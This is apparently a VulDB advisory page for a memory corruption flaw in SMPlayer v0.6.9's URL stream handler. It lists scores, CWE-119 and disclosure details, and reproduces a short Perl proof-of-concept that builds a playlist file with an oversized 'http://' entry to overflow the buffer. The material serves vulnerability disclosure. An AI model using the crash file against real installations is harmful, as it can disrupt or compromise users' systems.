SMPlayer v0.6.9 URL Stream memory corruption

CVSS Meta Temp Score
CVSS is a standardized scoring system to determine possibilities of attacks. The Temp Score considers temporal factors like disclosure, exploit and countermeasures. The unique Meta Score calculates the average score of different sources to provide a normalized scoring system.
Current Exploit Price (≈)
Our analysts are monitoring exploit markets and are in contact with vulnerability brokers. The range indicates the observed or calculated exploit price to be seen on exploit markets. A good indicator to understand the monetary effort required for and the popularity of an attack.
CTI Interest Score
Our Cyber Threat Intelligence team is monitoring different web sites, mailing lists, exploit markets and social media networks. The CTI Interest Score identifies the interest of attackers and the security community for this specific vulnerability in real-time. A high score indicates an elevated risk to be targeted for this vulnerability.
4.8$0-$5k0.00

Summaryinfo

A vulnerability was found in SMPlayer v0.6.9. It has been declared as critical. This affects an unknown function of the component URL Stream Handler. Executing a manipulation can lead to memory corruption. Moreover, an exploit is present.

Detailsinfo

A vulnerability was found in SMPlayer v0.6.9 (Multimedia Player Software). It has been declared as critical. This vulnerability affects some unknown processing of the component URL Stream Handler. The manipulation with an unknown input leads to a memory corruption vulnerability. The CWE definition for the vulnerability is CWE-119. The product performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. As an impact it is known to affect confidentiality, integrity, and availability.

The weakness was disclosed 08/19/2011 by Pim Campers (X4lt) as VL-ID 64 as not defined advisory (Website). The advisory is shared for download at vulnerability-lab.com. Technical details are unknown but a public exploit is available.

A public exploit has been developed by Pim Campers in Perl and been published immediately after the advisory. It is possible to download the exploit at vulnerability-lab.com. It is declared as proof-of-concept. The code used by the exploit is:

#!/usr/bin/perl
=gnk
     
=cut
##############################################################################
###################################################################
my $header1="[playlist]\n";
my $header2="NumberOfEntries=1\n";
my $header3="File1=http://";
my $bof="\x41" x 7500000;
###################################################################
open(myfile,'>> 7500000.pls');
print myfile $header1.$header2.$header3.$bof;
###################################################################

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

Once again VulDB remains the best source for vulnerability data.

Productinfo

Type

Name

Version

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB Vector: 🔍
VulDB Reliability: 🔍

CVSSv3info

VulDB Meta Base Score: 5.3
VulDB Meta Temp Score: 4.8

VulDB Base Score: 5.3
VulDB Temp Score: 4.8
VulDB Vector: 🔍
VulDB Reliability: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VectorComplexityAuthenticationConfidentialityIntegrityAvailability
UnlockUnlockUnlockUnlockUnlockUnlock
UnlockUnlockUnlockUnlockUnlockUnlock
UnlockUnlockUnlockUnlockUnlockUnlock

VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Reliability: 🔍

Exploitinginfo

Class: Memory corruption
CWE: CWE-119
CAPEC: 🔍
ATT&CK: 🔍

Physical: Partially
Local: Yes
Remote: No

Availability: 🔍
Access: Public
Status: Proof-of-Concept
Author: Pim Campers
Programming Language: 🔍
Download: 🔍
Price Prediction: 🔍
Current Price Estimation: 🔍

0-DayUnlockUnlockUnlockUnlock
TodayUnlockUnlockUnlockUnlock

Threat Intelligenceinfo

Interest: 🔍
Active Actors: 🔍
Active APT Groups: 🔍

Countermeasuresinfo

Recommended: no mitigation known
Status: 🔍

0-Day Time: 🔍
Exploit Delay Time: 🔍

Timelineinfo

08/19/2011 🔍
08/19/2011 +0 days 🔍
09/06/2016 +1845 days 🔍
04/09/2019 +945 days 🔍

Sourcesinfo

Advisory: VL-ID 64
Researcher: Pim Campers (X4lt)
Status: Not defined

GCVE (VulDB): GCVE-100-91132
scip Labs: https://www.scip.ch/en/?labs.20161013

Entryinfo

Created: 09/06/2016 12:12
Updated: 04/09/2019 20:38
Changes: 09/06/2016 12:12 (45), 04/09/2019 20:38 (2)
Complete: 🔍
Cache ID: 216::103

Once again VulDB remains the best source for vulnerability data.

Discussion

No comments yet. Languages: en.

Please log in to comment.

Do you want to use VulDB in your project?

Use the official API to access entries easily!